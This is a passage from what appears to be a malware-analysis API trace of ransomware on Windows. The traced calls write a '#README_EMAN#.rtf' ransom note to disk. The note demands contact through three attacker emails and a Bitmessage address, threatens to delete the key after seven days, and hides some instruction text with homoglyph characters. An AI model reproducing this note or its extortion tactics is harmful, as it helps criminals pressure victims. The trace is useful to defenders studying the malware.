\\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0267.740] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x3957a28, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\x8a³ÒÂÅ·OI:\x98(h\x92<\x13w/Z÷¢éhF£?", lpUsedDefaultChar=0x0) returned 8717 [0267.740] WriteFile (in: hFile=0x2ec, lpBuffer=0x3957a28*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x3957a28*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0267.741] CloseHandle (hObject=0x2ec) returned 1 [0267.741] GetFileAttributesW (lpFileName="C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\#readme_eman#.rtf")) returned 0xffffffff [0267.741] GetLastError () returned 0x2 [0267.741] CreateFileW (lpFileName="C:\\ProgramData\\Package Cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\#README_EMAN#.rtf" (normalized: "c:\\programdata\\package cache\\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0267.742] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that 